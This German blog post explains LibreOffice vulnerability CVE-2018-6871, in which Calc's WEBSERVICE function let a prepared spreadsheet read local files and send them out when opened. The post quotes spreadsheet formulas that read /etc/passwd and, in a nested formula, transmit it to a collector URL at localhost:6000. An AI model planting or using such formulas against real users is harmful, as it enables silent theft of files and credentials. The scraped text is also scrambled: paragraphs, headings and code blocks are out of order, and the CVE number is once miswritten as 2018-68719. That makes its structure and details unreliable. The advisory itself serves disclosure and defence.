![](\"https:\/\/borncity.com\/blog\/wp-content\/uploads\/2015\/01\/Schutz.jpg\")
Nun hat es auch LibreOffice erwischt. Denn in LibreOffice kann man nun mit pr\u00e4parierten Tabellendokumenten mal eben so im Hintergrund Dateien ins Internet verschicken. Diese Remote Arbitrary File Disclosure-Sicherheitsl\u00fccke (CVE-2018-68719 wurde in LibreOffice 5.4.5\/6.0.1 geschlossen.<\/p>\n
<\/p>\n
LibreOffice unterst\u00fctzt die Funktion COM.MICROSOFT.WEBSERVICE aus Microsoft Office. Eine Beschreibung der Funktion, die in Microsoft Excel 2013 und 2016 verf\u00fcgbar ist, findet sich auf dieser Microsoft Seite<\/a>. Zweck der Funktion in Excel ist es, Daten von einem Webservice im Internet oder Intranet zu holen. Dazu braucht der Funktion nur die URL der Ressource aus dem Internet\/Intranet als Parameter \u00fcbergeben zu werden. <\/p>\n =WEBSERVICE(\"http:\/\/mywebservice.com\/serviceEndpoint?searchString=Excel\") <\/p>\n Hier ist ein Beispiel f\u00fcr einen Aufruf: <\/p>\n Bei Microsoft findet sich in der Funktionsbeschreibung allerdings eine gewichtige Einschr\u00e4nkung:<\/p>\n For protocols that are not supported, such as ftp: \/\/ or file: \/\/, WEBSERVICE returns the #VALUE! error value.<\/p>\n<\/blockquote>\n Es lassen sich also keine Dateien per ftp oder file-Protokoll \u00fcber diese Funktion implementieren. In LibreOffice wurden diese Restriktionen vor den Versionen 5.4.5\/6.0.1 leider nicht implementiert.<\/p>\n Standardm\u00e4\u00dfig werden die Zellen in LibreOffice Calc nicht aktualisiert. Sofern Sie aber einen Zelltyp wie ~error<\/em> angeben, wird die Zelle beim \u00d6ffnen des Dokuments aktualisiert. Dies erm\u00f6glicht es, Dateien \u00fcber diese Schwachstelle zu versenden, sie @jollheef (Mikhail Klementev) von seccomp.ru auf GitHub erl\u00e4utert<\/a>. Um eine Datei lokal zu lesen, lie\u00dfe sich in LibreOffice Calc folgende Anweisung verwenden:<\/p>\n Dann reicht die nachfolgende Anweisung, um die betreffende Datei zu lesen und dann zu versenden:<\/p>\n In anderen LibreOffice-Modulen lie\u00dfe sich eine Calc-Tabelle einbetten. Dann erm\u00f6glicht die Sicherheitsl\u00fccke CVE-2018-6871 beliebige Dateien im Zugriff des Benutzers zu lesen und ins Internet zu versenden. <\/p>\n Es ist also relativ einfach, beliebige Dateien mit Schl\u00fcsseln, Passw\u00f6rtern und allem anderen zu versenden. Die Erfolgsquote liegt bei 100%, und das Ganze erfolgt f\u00fcr den Nutzer unsichtbar im Hintergrund \u2013 er bekommt davon nichts mit. Alles, was es braucht, ist eine pr\u00e4parierte Datei mit der manipulierten Calc-Tabelle. Der Exploit bzw. das Proof of Concept von @jollheef funktioniert in allen LibreOffice Versionen vor 5.4.5\/6.0.1 und dazu in allen Betriebssystemen (GNU\/Linux, MS Windows, MacOS etc.). Die manipulierte Calc-Tabelle kann in fast alle von LO unterst\u00fctzten Formate eingebettet werden. <\/p>\nGerade wurde das B\u00fcro-Software-Paket LibreOffice 6.0 freigegeben. Quasi die Alternative zu Microsoft Office, die dazu auch noch kostenlos ist und auf verschiedenen Betriebssystemplattformen (Linux, macOS und Windows) l\u00e4uft. Die Software wird schrittweise mit diversen Features aufger\u00fcstet \u2013 Sicherheitsl\u00fccken inbegriffen. Blog-Leser Ralf H. hat mich die Nacht per Mail auf das Thema aufmerksam gemacht (danke daf\u00fcr). Es gibt inzwischen auch Posts bei Hacker News, auf securelist.org<\/a> und auf reddit.com<\/a>.<\/p>\n
Remote Arbitrary File Disclosure (CVE-2018-6871)<\/h2>\n
=FILTERXML(WEBSERVICE(\"http:\/\/api.openweathermap.org\/data\/2.5\/forecast?q=Copenhagen,dk&mode=xml&units=metric\");\"number(\/weatherdata\/forecast\/time[2]\/temperature\/@value)\")<\/code><\/pre>\n\n
=WEBSERVICE(\"\/etc\/passwd\")<\/pre>\n
=WEBSERVICE(\"http:\/\/localhost:6000\/?q=\" & WEBSERVICE(\"\/etc\/passwd\"))<\/code><\/pre>\nFehler bei LibreOffice bekannt und gefixt<\/h2>\n